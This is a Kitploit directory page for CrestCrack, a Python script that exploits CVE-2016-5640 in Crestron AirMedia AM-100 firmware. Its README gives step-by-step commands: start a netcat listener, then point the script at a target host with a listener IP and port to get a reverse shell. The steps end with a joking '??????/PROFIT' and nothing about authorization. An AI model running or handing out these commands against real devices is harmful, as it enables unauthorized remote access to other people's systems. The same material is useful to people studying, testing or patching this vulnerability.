Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CrestCrack — Exploits CVE-2016-5640 / CLVA-2016-05-002 against Crestron AM-100 | Kitploit
Tools/GitHubGitHub/vpnguy-zz/crestcrack
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubvpnguy-zz/crestcrack

CrestCrack

Exploits CVE-2016-5640 / CLVA-2016-05-002 against Crestron AM-100

View Repository
729 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Supported Python versions

CrestCrack

CrestCrack is a simple script that exploits CVE-2016-5640 / CLVA-2016-05-002 within the Crestron AirMedia AM-100 (v1.1.1.11 - v1.2.1). When supplied with arguments CrestCrack will utilize netcat to create a reverse shell between your target and a netcat listener of your choice.

Setup:

  1. Clone a copy of CrestCrack git clone https://github.com/vpnguy/CrestCrack
  2. Launch a netcat listener nc -lvp 1337
  3. Execute CrestCrack against your target with your listener info ./crestcrack.py https://targethost 255.255.255.255 1337
  4. ??????
  5. PROFIT

###Usage: ./crescrack.py [target host] [listener IP] [listener port]

###Example: ./crescrack.py https://targethost 123.123.123.123 3311

Additional Vulnerability Information:

Cylance Vulnerability Disclosure

NIST CVE-2016-5640

To be added:

  • Error handling/bounds checking
  • Enhanced argument support
  • --help output
Download Tool